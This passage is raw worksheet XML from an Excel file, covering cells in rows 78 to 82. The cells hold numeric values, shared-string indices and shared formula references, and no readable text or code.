      <c r="BM78" s="83"/>
      <c r="BN78" s="83"/>
      <c r="BO78" s="83"/>
      <c r="BP78" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ78" s="83"/>
      <c r="BR78" s="83"/>
      <c r="BS78" s="83"/>
      <c r="BT78" s="83"/>
      <c r="BU78" s="83"/>
      <c r="BV78" s="83"/>
      <c r="BW78" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX78" s="85">
        <v>254.0</v>
      </c>
      <c r="BY78" s="85">
        <v>1.0</v>
      </c>
      <c r="BZ78" s="85">
        <v>4.0</v>
      </c>
      <c r="CA78" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB78" s="85">
        <v>254.0</v>
      </c>
      <c r="CC78" s="85"/>
      <c r="CD78" s="85"/>
      <c r="CE78" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF78" s="85"/>
      <c r="CG78" s="85"/>
      <c r="CH78" s="85"/>
      <c r="CI78" s="85"/>
      <c r="CJ78" s="86"/>
      <c r="CK78" s="86"/>
      <c r="CL78" s="86"/>
      <c r="CM78" s="86">
        <v>0.0</v>
      </c>
      <c r="CN78" s="86"/>
      <c r="CO78" s="86"/>
      <c r="CP78" s="86"/>
      <c r="CQ78" s="86"/>
      <c r="CR78" s="86"/>
      <c r="CS78" s="86"/>
      <c r="CT78" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU78" s="88" t="s">
        <v>833</v>
      </c>
      <c r="CV78" s="88">
        <v>3.0</v>
      </c>
      <c r="CW78" s="88">
        <v>10.0</v>
      </c>
      <c r="CX78" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY78" s="88">
        <v>254.0</v>
      </c>
      <c r="CZ78" s="88"/>
      <c r="DA78" s="88"/>
      <c r="DB78" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC78" s="88"/>
      <c r="DD78" s="88"/>
      <c r="DE78" s="88"/>
      <c r="DF78" s="88"/>
      <c r="DG78" s="89"/>
      <c r="DH78" s="89"/>
      <c r="DI78" s="89"/>
      <c r="DJ78" s="89">
        <v>0.0</v>
      </c>
      <c r="DK78" s="89"/>
      <c r="DL78" s="89"/>
      <c r="DM78" s="89"/>
      <c r="DN78" s="89"/>
      <c r="DO78" s="89"/>
      <c r="DP78" s="89"/>
      <c r="DQ78" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR78" s="91"/>
      <c r="DS78" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT78" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU78" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV78" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW78" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX78" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY78" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ78" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA78" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB78" s="74">
        <v>5.0</v>
      </c>
      <c r="EC78" s="74">
        <v>0.0</v>
      </c>
      <c r="ED78" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE78" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="79" ht="153.75" customHeight="1">
      <c r="B79" s="71" t="s">
        <v>658</v>
      </c>
      <c r="C79" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D79" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E79" s="72" t="s">
        <v>834</v>
      </c>
      <c r="F79" s="72" t="s">
        <v>835</v>
      </c>
      <c r="G79" s="97" t="s">
        <v>836</v>
      </c>
      <c r="H79" s="72" t="s">
        <v>837</v>
      </c>
      <c r="I79" s="73" t="s">
        <v>838</v>
      </c>
      <c r="J79" s="73" t="s">
        <v>650</v>
      </c>
      <c r="K79" s="73" t="s">
        <v>839</v>
      </c>
      <c r="L79" s="74">
        <v>12.0</v>
      </c>
      <c r="M79" s="74">
        <v>1.0</v>
      </c>
      <c r="N79" s="74">
        <v>1.0</v>
      </c>
      <c r="O79" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P79" s="74">
        <v>1.0</v>
      </c>
      <c r="Q79" s="74">
        <v>0.0</v>
      </c>
      <c r="R79" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S79" s="76" t="s">
        <v>840</v>
      </c>
      <c r="T79" s="108" t="s">
        <v>838</v>
      </c>
      <c r="U79" s="77" t="s">
        <v>841</v>
      </c>
      <c r="V79" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W79" s="109"/>
      <c r="X79" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y79" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z79" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA79" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB79" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC79" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD79" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE79" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF79" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG79" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH79" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI79" s="78"/>
      <c r="AJ79" s="78"/>
      <c r="AK79" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL79" s="78"/>
      <c r="AM79" s="78"/>
      <c r="AN79" s="78"/>
      <c r="AO79" s="78"/>
      <c r="AP79" s="80"/>
      <c r="AQ79" s="80"/>
      <c r="AR79" s="80"/>
      <c r="AS79" s="80">
        <v>0.0</v>
      </c>
      <c r="AT79" s="80"/>
      <c r="AU79" s="80"/>
      <c r="AV79" s="80"/>
      <c r="AW79" s="80"/>
      <c r="AX79" s="80"/>
      <c r="AY79" s="80"/>
      <c r="AZ79" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA79" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB79" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC79" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD79" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE79" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF79" s="82"/>
      <c r="BG79" s="82"/>
      <c r="BH79" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI79" s="82"/>
      <c r="BJ79" s="82"/>
      <c r="BK79" s="82"/>
      <c r="BL79" s="82"/>
      <c r="BM79" s="83"/>
      <c r="BN79" s="83"/>
      <c r="BO79" s="83"/>
      <c r="BP79" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ79" s="83"/>
      <c r="BR79" s="83"/>
      <c r="BS79" s="83"/>
      <c r="BT79" s="83"/>
      <c r="BU79" s="83"/>
      <c r="BV79" s="83"/>
      <c r="BW79" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX79" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY79" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ79" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA79" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB79" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC79" s="85"/>
      <c r="CD79" s="85"/>
      <c r="CE79" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF79" s="85"/>
      <c r="CG79" s="85"/>
      <c r="CH79" s="85"/>
      <c r="CI79" s="85"/>
      <c r="CJ79" s="86"/>
      <c r="CK79" s="86"/>
      <c r="CL79" s="86"/>
      <c r="CM79" s="86">
        <v>0.0</v>
      </c>
      <c r="CN79" s="86"/>
      <c r="CO79" s="86"/>
      <c r="CP79" s="86"/>
      <c r="CQ79" s="86"/>
      <c r="CR79" s="86"/>
      <c r="CS79" s="86"/>
      <c r="CT79" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU79" s="88" t="s">
        <v>149</v>
      </c>
      <c r="CV79" s="88">
        <v>2.0</v>
      </c>
      <c r="CW79" s="88">
        <v>2.0</v>
      </c>
      <c r="CX79" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY79" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ79" s="88"/>
      <c r="DA79" s="88"/>
      <c r="DB79" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC79" s="88"/>
      <c r="DD79" s="88"/>
      <c r="DE79" s="88"/>
      <c r="DF79" s="88"/>
      <c r="DG79" s="89"/>
      <c r="DH79" s="89"/>
      <c r="DI79" s="89"/>
      <c r="DJ79" s="89">
        <v>0.0</v>
      </c>
      <c r="DK79" s="89"/>
      <c r="DL79" s="89"/>
      <c r="DM79" s="89"/>
      <c r="DN79" s="89"/>
      <c r="DO79" s="89"/>
      <c r="DP79" s="89"/>
      <c r="DQ79" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR79" s="91"/>
      <c r="DS79" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT79" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU79" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV79" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW79" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX79" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY79" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ79" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA79" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB79" s="74">
        <v>1.0</v>
      </c>
      <c r="EC79" s="74">
        <v>10.0</v>
      </c>
      <c r="ED79" s="95">
        <f t="shared" si="10"/>
        <v>10</v>
      </c>
      <c r="EE79" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="80" ht="153.75" customHeight="1">
      <c r="B80" s="71" t="s">
        <v>351</v>
      </c>
      <c r="C80" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D80" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E80" s="72" t="s">
        <v>842</v>
      </c>
      <c r="F80" s="72" t="s">
        <v>843</v>
      </c>
      <c r="G80" s="97" t="s">
        <v>844</v>
      </c>
      <c r="H80" s="72" t="s">
        <v>845</v>
      </c>
      <c r="I80" s="73" t="s">
        <v>846</v>
      </c>
      <c r="J80" s="73" t="s">
        <v>847</v>
      </c>
      <c r="K80" s="73" t="s">
        <v>848</v>
      </c>
      <c r="L80" s="74">
        <v>198.0</v>
      </c>
      <c r="M80" s="74">
        <v>1.0</v>
      </c>
      <c r="N80" s="74">
        <v>1.0</v>
      </c>
      <c r="O80" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P80" s="74">
        <v>1.0</v>
      </c>
      <c r="Q80" s="74">
        <v>0.0</v>
      </c>
      <c r="R80" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S80" s="76" t="s">
        <v>849</v>
      </c>
      <c r="T80" s="76" t="s">
        <v>850</v>
      </c>
      <c r="U80" s="77" t="s">
        <v>851</v>
      </c>
      <c r="V80" s="76" t="s">
        <v>852</v>
      </c>
      <c r="W80" s="76" t="s">
        <v>853</v>
      </c>
      <c r="X80" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y80" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z80" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA80" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB80" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC80" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD80" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE80" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF80" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG80" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH80" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI80" s="78"/>
      <c r="AJ80" s="78"/>
      <c r="AK80" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL80" s="78"/>
      <c r="AM80" s="78"/>
      <c r="AN80" s="78"/>
      <c r="AO80" s="78"/>
      <c r="AP80" s="80"/>
      <c r="AQ80" s="80"/>
      <c r="AR80" s="80"/>
      <c r="AS80" s="80">
        <v>0.0</v>
      </c>
      <c r="AT80" s="80"/>
      <c r="AU80" s="80"/>
      <c r="AV80" s="80"/>
      <c r="AW80" s="80"/>
      <c r="AX80" s="80"/>
      <c r="AY80" s="80"/>
      <c r="AZ80" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA80" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB80" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC80" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD80" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE80" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF80" s="82"/>
      <c r="BG80" s="82"/>
      <c r="BH80" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI80" s="82"/>
      <c r="BJ80" s="82"/>
      <c r="BK80" s="82"/>
      <c r="BL80" s="82"/>
      <c r="BM80" s="83"/>
      <c r="BN80" s="83"/>
      <c r="BO80" s="83"/>
      <c r="BP80" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ80" s="83"/>
      <c r="BR80" s="83"/>
      <c r="BS80" s="83"/>
      <c r="BT80" s="83"/>
      <c r="BU80" s="83"/>
      <c r="BV80" s="83"/>
      <c r="BW80" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX80" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY80" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ80" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA80" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB80" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC80" s="85"/>
      <c r="CD80" s="85"/>
      <c r="CE80" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF80" s="85"/>
      <c r="CG80" s="85"/>
      <c r="CH80" s="85"/>
      <c r="CI80" s="85"/>
      <c r="CJ80" s="86"/>
      <c r="CK80" s="86"/>
      <c r="CL80" s="86"/>
      <c r="CM80" s="86">
        <v>0.0</v>
      </c>
      <c r="CN80" s="86"/>
      <c r="CO80" s="86"/>
      <c r="CP80" s="86"/>
      <c r="CQ80" s="86"/>
      <c r="CR80" s="86"/>
      <c r="CS80" s="86"/>
      <c r="CT80" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU80" s="88" t="s">
        <v>361</v>
      </c>
      <c r="CV80" s="88">
        <v>3.0</v>
      </c>
      <c r="CW80" s="88">
        <v>7.0</v>
      </c>
      <c r="CX80" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY80" s="88">
        <v>2100527.0</v>
      </c>
      <c r="CZ80" s="88"/>
      <c r="DA80" s="88"/>
      <c r="DB80" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC80" s="88"/>
      <c r="DD80" s="88"/>
      <c r="DE80" s="88"/>
      <c r="DF80" s="88"/>
      <c r="DG80" s="89"/>
      <c r="DH80" s="89"/>
      <c r="DI80" s="89"/>
      <c r="DJ80" s="89">
        <v>0.0</v>
      </c>
      <c r="DK80" s="89"/>
      <c r="DL80" s="89"/>
      <c r="DM80" s="89"/>
      <c r="DN80" s="89"/>
      <c r="DO80" s="89"/>
      <c r="DP80" s="89"/>
      <c r="DQ80" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR80" s="91"/>
      <c r="DS80" s="92">
        <v>48370.0</v>
      </c>
      <c r="DT80" s="93">
        <v>1.0</v>
      </c>
      <c r="DU80" s="93">
        <v>20.0</v>
      </c>
      <c r="DV80" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW80" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX80" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY80" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ80" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA80" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB80" s="74">
        <v>198.0</v>
      </c>
      <c r="EC80" s="74">
        <v>1.0</v>
      </c>
      <c r="ED80" s="95">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="EE80" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="81" ht="153.75" customHeight="1">
      <c r="B81" s="71" t="s">
        <v>351</v>
      </c>
      <c r="C81" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D81" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E81" s="72" t="s">
        <v>854</v>
      </c>
      <c r="F81" s="72" t="s">
        <v>855</v>
      </c>
      <c r="G81" s="97" t="s">
        <v>12</v>
      </c>
      <c r="H81" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I81" s="73" t="s">
        <v>856</v>
      </c>
      <c r="J81" s="73" t="s">
        <v>857</v>
      </c>
      <c r="K81" s="73" t="s">
        <v>858</v>
      </c>
      <c r="L81" s="74">
        <v>1.0</v>
      </c>
      <c r="M81" s="74">
        <v>1.0</v>
      </c>
      <c r="N81" s="74">
        <v>1.0</v>
      </c>
      <c r="O81" s="74">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="P81" s="74">
        <v>1.0</v>
      </c>
      <c r="Q81" s="74">
        <v>1.0</v>
      </c>
      <c r="R81" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S81" s="76" t="s">
        <v>859</v>
      </c>
      <c r="T81" s="76" t="s">
        <v>850</v>
      </c>
      <c r="U81" s="77" t="s">
        <v>860</v>
      </c>
      <c r="V81" s="76" t="s">
        <v>861</v>
      </c>
      <c r="W81" s="76" t="s">
        <v>862</v>
      </c>
      <c r="X81" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y81" s="75" t="s">
        <v>863</v>
      </c>
      <c r="Z81" s="75" t="s">
        <v>864</v>
      </c>
      <c r="AA81" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB81" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC81" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD81" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE81" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF81" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG81" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH81" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI81" s="78"/>
      <c r="AJ81" s="78"/>
      <c r="AK81" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL81" s="78"/>
      <c r="AM81" s="78"/>
      <c r="AN81" s="78"/>
      <c r="AO81" s="78"/>
      <c r="AP81" s="80"/>
      <c r="AQ81" s="80"/>
      <c r="AR81" s="80"/>
      <c r="AS81" s="80">
        <v>0.0</v>
      </c>
      <c r="AT81" s="80"/>
      <c r="AU81" s="80"/>
      <c r="AV81" s="80"/>
      <c r="AW81" s="80"/>
      <c r="AX81" s="80"/>
      <c r="AY81" s="80"/>
      <c r="AZ81" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA81" s="163" t="s">
        <v>865</v>
      </c>
      <c r="BB81" s="82">
        <v>2.0</v>
      </c>
      <c r="BC81" s="82">
        <v>2.0</v>
      </c>
      <c r="BD81" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE81" s="163" t="s">
        <v>865</v>
      </c>
      <c r="BF81" s="163"/>
      <c r="BG81" s="163"/>
      <c r="BH81" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI81" s="163"/>
      <c r="BJ81" s="163"/>
      <c r="BK81" s="163"/>
      <c r="BL81" s="163"/>
      <c r="BM81" s="164"/>
      <c r="BN81" s="164"/>
      <c r="BO81" s="164"/>
      <c r="BP81" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ81" s="83"/>
      <c r="BR81" s="83"/>
      <c r="BS81" s="83"/>
      <c r="BT81" s="83"/>
      <c r="BU81" s="83"/>
      <c r="BV81" s="83"/>
      <c r="BW81" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX81" s="165" t="s">
        <v>865</v>
      </c>
      <c r="BY81" s="85">
        <v>2.0</v>
      </c>
      <c r="BZ81" s="85">
        <v>2.0</v>
      </c>
      <c r="CA81" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB81" s="165" t="s">
        <v>865</v>
      </c>
      <c r="CC81" s="165"/>
      <c r="CD81" s="165"/>
      <c r="CE81" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF81" s="165"/>
      <c r="CG81" s="165"/>
      <c r="CH81" s="165"/>
      <c r="CI81" s="165"/>
      <c r="CJ81" s="166"/>
      <c r="CK81" s="166"/>
      <c r="CL81" s="166"/>
      <c r="CM81" s="86">
        <v>0.0</v>
      </c>
      <c r="CN81" s="86"/>
      <c r="CO81" s="86"/>
      <c r="CP81" s="86"/>
      <c r="CQ81" s="86"/>
      <c r="CR81" s="86"/>
      <c r="CS81" s="86"/>
      <c r="CT81" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU81" s="88" t="s">
        <v>866</v>
      </c>
      <c r="CV81" s="88">
        <v>4.0</v>
      </c>
      <c r="CW81" s="88">
        <v>4.0</v>
      </c>
      <c r="CX81" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY81" s="167" t="s">
        <v>865</v>
      </c>
      <c r="CZ81" s="167"/>
      <c r="DA81" s="167"/>
      <c r="DB81" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC81" s="167"/>
      <c r="DD81" s="167"/>
      <c r="DE81" s="167"/>
      <c r="DF81" s="167"/>
      <c r="DG81" s="89"/>
      <c r="DH81" s="89"/>
      <c r="DI81" s="89"/>
      <c r="DJ81" s="89">
        <v>0.0</v>
      </c>
      <c r="DK81" s="89"/>
      <c r="DL81" s="89"/>
      <c r="DM81" s="89"/>
      <c r="DN81" s="89"/>
      <c r="DO81" s="89"/>
      <c r="DP81" s="89"/>
      <c r="DQ81" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR81" s="91"/>
      <c r="DS81" s="168">
        <v>52169.0</v>
      </c>
      <c r="DT81" s="93">
        <v>1.0</v>
      </c>
      <c r="DU81" s="93">
        <v>2.0</v>
      </c>
      <c r="DV81" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW81" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX81" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY81" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ81" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA81" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB81" s="74">
        <v>1.0</v>
      </c>
      <c r="EC81" s="74">
        <v>1.0</v>
      </c>
      <c r="ED81" s="95">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="EE81" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="82" ht="197.25" customHeight="1">
      <c r="B82" s="71" t="s">
        <v>351</v>
      </c>
      <c r="C82" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D82" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E82" s="72" t="s">
        <v>867</v>
      </c>
      <c r="F82" s="72" t="s">
        <v>868</v>
      </c>
      <c r="G82" s="97" t="s">
        <v>12</v>
      </c>
      <c r="H82" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I82" s="73" t="s">
        <v>869</v>
      </c>
      <c r="J82" s="73" t="s">
        <v>870</v>
      </c>
      <c r="K82" s="73" t="s">
        <v>871</v>
      </c>
      <c r="L82" s="74">
        <v>4.0</v>
      </c>
      <c r="M82" s="74">
        <v>1.0</v>
      </c>
      <c r="N82" s="74">
        <v>1.0</v>
      </c>
      <c r="O82" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P82" s="74">
        <v>1.0</v>
      </c>
      <c r="Q82" s="74">
        <v>0.0</v>
      </c>
      <c r="R82" s="75" t="s">
        <v>373</v>
      </c>
      <c r="S82" s="76" t="s">
        <v>872</v>
      </c>
      <c r="T82" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U82" s="77" t="s">
        <v>873</v>
      </c>
      <c r="V82" s="76" t="s">
        <v>874</v>
      </c>
      <c r="W82" s="76" t="s">
        <v>875</v>
      </c>
      <c r="X82" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y82" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z82" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA82" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB82" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC82" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD82" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE82" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF82" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG82" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH82" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI82" s="78"/>
      <c r="AJ82" s="78"/>
      <c r="AK82" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL82" s="78"/>
      <c r="AM82" s="78"/>
      <c r="AN82" s="78"/>
      <c r="AO82" s="78"/>
      <c r="AP82" s="80"/>
      <c r="AQ82" s="80"/>
      <c r="AR82" s="80"/>
      <c r="AS82" s="80">
        <v>0.0</v>
      </c>
      <c r="AT82" s="80"/>
      <c r="AU82" s="80"/>
      <c r="AV82" s="80"/>
      <c r="AW82" s="80"/>
      <c r="AX82" s="80"/>
      <c r="AY82" s="80"/>
      <c r="AZ82" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA82" s="102" t="s">
        <v>876</v>
      </c>
      <c r="BB82" s="82">
        <v>3.0</v>
      </c>
      <c r="BC82" s="82">
        <v>12.0</v>
      </c>
      <c r="BD82" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE82" s="102" t="s">
        <v>876</v>
      </c>
      <c r="BF82" s="102"/>
      <c r="BG82" s="102"/>
      <c r="BH82" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI82" s="102"/>
      <c r="BJ82" s="102"/>
      <c r="BK82" s="102"/>
      <c r="BL82" s="102"/>
      <c r="BM82" s="103"/>
      <c r="BN82" s="103"/>
      <c r="BO82" s="103"/>
      <c r="BP82" s="83">
        <v>1.0</v>
      </c>
      <c r="BQ82" s="83"/>
      <c r="BR82" s="83"/>
      <c r="BS82" s="83"/>
      <c r="BT82" s="83"/>
      <c r="BU82" s="83"/>
      <c r="BV82" s="83"/>
      <c r="BW82" s="84">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="BX82" s="85" t="s">
        <v>877</v>
      </c>
      <c r="BY82" s="85">
        <v>4.0</v>
      </c>
      <c r="BZ82" s="85">
        <v>13.0</v>
      </c>
      <c r="CA82" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB82" s="85" t="s">
        <v>878</v>
      </c>
      <c r="CC82" s="85"/>
      <c r="CD82" s="85"/>
      <c r="CE82" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF82" s="85"/>
      <c r="CG82" s="85"/>
      <c r="CH82" s="85"/>
      <c r="CI82" s="85"/>
      <c r="CJ82" s="86"/>
      <c r="CK82" s="86"/>
      <c r="CL82" s="86"/>
      <c r="CM82" s="86">
        <v>1.0</v>
      </c>
      <c r="CN82" s="86"/>
      <c r="CO82" s="86"/>
      <c r="CP82" s="86"/>
      <c r="CQ82" s="86"/>
      <c r="CR82" s="86"/>
      <c r="CS82" s="86"/>
      <c r="CT82" s="87">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="CU82" s="88" t="s">
        <v>879</v>
      </c>
      <c r="CV82" s="88">
        <v>9.0</v>
      </c>
      <c r="CW82" s="88">
        <v>38.0</v>
      </c>
      <c r="CX82" s="79" t="s">
        <v>880</v>
      </c>
      <c r="CY82" s="88" t="s">
        <v>881</v>
      </c>
      <c r="CZ82" s="88"/>
      <c r="DA82" s="88"/>
      <c r="DB82" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC82" s="88"/>
      <c r="DD82" s="88"/>
      <c r="DE82" s="88"/>
      <c r="DF82" s="88"/>
      <c r="DG82" s="89"/>
      <c r="DH82" s="89"/>
      <c r="DI82" s="89"/>
      <c r="DJ82" s="89">
        <v>1.0</v>
      </c>
      <c r="DK82" s="89"/>
      <c r="DL82" s="89"/>
      <c r="DM82" s="89"/>
      <c r="DN82" s="89"/>
      <c r="DO82" s="89"/>
      <c r="DP82" s="89"/>
      <c r="DQ82" s="90">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="DR82" s="91"/>
      <c r="DS82" s="92">
        <v>52169.0</v>
      </c>
      <c r="DT82" s="93">
        <v>1.0</v>
      </c>
      <c r="DU82" s="93">
        <v>4.0</v>
      </c>
      <c r="DV82" s="94" t="s">
